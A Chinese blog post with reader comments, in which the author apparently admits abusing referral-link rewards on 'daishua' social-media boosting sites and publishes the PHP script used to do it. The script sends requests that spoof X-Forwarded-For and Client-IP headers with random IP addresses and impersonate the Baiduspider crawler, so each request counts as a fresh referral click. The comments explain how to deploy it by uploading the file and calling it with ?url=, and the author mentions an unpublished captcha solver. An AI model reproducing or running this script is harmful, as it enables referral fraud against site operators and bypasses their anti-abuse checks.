最近各位应该知道那些代刷网的漏洞吧,就是推广漏洞,无限撸的漏洞,别的地方我不知道,反正我的群(群号:545688344)撸爆了。作俑者就是我,给各位站长说抱歉了,下面放出我的思路和代码。
开始我就猜想模拟X-FORWARDED-FOR和CLIENT-IP可不可以实现他这个一个IP点击一次算推广一次的方法,事实证明是可以的,但是基本所有的代刷网都有个特点 用 curl 或者 get_contents 这两个函数都不能访问,个人猜想应该是有屏蔽(PS:我没看过代刷网的源码),但是我看到似乎很多代刷网百度都有收录,就想模拟百度蜘蛛应该可以吧,于是就用模拟了百度的USER_AGENT,运行结果可行,下面贴代码:
<?php
// 关闭PHP报错
error_reporting( E_ALL^E_NOTICE^E_WARNING );
//实现使用curl模拟百度蜘蛛进行采集
function Go( $url )
{
$ch = curl_init();
//随机生成IP
$ip = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255) ; // 百度蜘蛛
$timeout = 15;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_TIMEOUT,0);
//伪造百度蜘蛛IP
curl_setopt($ch,CURLOPT_HTTPHEADER,array('X-FORWARDED-FOR:'.$ip.'','CLIENT-IP:'.$ip.''));
//伪造百度蜘蛛头部
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_HEADER,0);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
$content = curl_exec($ch);
}
//判断url是否存在 存在进行访问
if ($_GET['url']) {
$api = $_GET['url'];
$data = Go($api);
sleep(10);
$mydata = ['msg'=>200,'val'=>'提交成功','num'=>1];
exit(json_encode($mydata, JSON_UNESCAPED_UNICODE));
}else{
$mydata = ['msg'=>404,'val'=>'提交失败','cause'=>'URL推广链接不能为空'];
exit(json_encode($mydata, JSON_UNESCAPED_UNICODE));
}
给各位站长的建议:推广插件尽量还是别用,如果要用还是加验证码,验证码比较容易识别的就算了,你们现在那种验证码我已经写好识别了,但是考虑到问题决定暂时不发,请各位站长及时修复!
原创文章 未经许可 禁止搬运!
28 条评论
如果发起 http 连接后立即关闭效率比较高,嘿嘿OωO
推广链接填在哪
评论下面有 你找找评论
就是不知道网址输在哪里,怎么使用,以前很少用php,是用油猴吗?⌇●﹏●⌇谢谢
现在彩虹写了新版 应该不能用了 这是很老的版本了 不过你可以试试
域名/PHP文件?url=你的推广链接
能给一个范例网址吗?一直没弄懂【尴尬】
那里不懂
{"msg":404,"val":"提交失败","cause":"URL推广链接不能为空"}提示这个
get传值在哪
url在哪填写
GET传值
搞完了是不是点一次等于一次推广?那我点无数次不就有无数个了吗?
是的 理论是这样 但是如果他有限制或者这有验证码就不能绕过!
搞好了点一次就等于是推广一个了?意思是不是我点无数次就有无数次个赞?
提示的这个 {"msg":200,"val":null,"num":1}
我加你qq看看
哦哦 原来如此
这玩意怎么用...
创建一个PHP文件 把代码复制到到里面 然后上传运行就行了 格式 你的 域名/PHP文件?url=你的推广链接
难怪我发现我充了一百块钱,现在只有毛线。
别秀了 表弟
这个封装类岂不是鸡肋?
我其他也用这个类 但是放出来直接合成一个文件好点 其他的代码你懂的
666(ฅ´ω`ฅ)
6666
我操你吗?我特么充了几次钱。原来是你
大佬我错了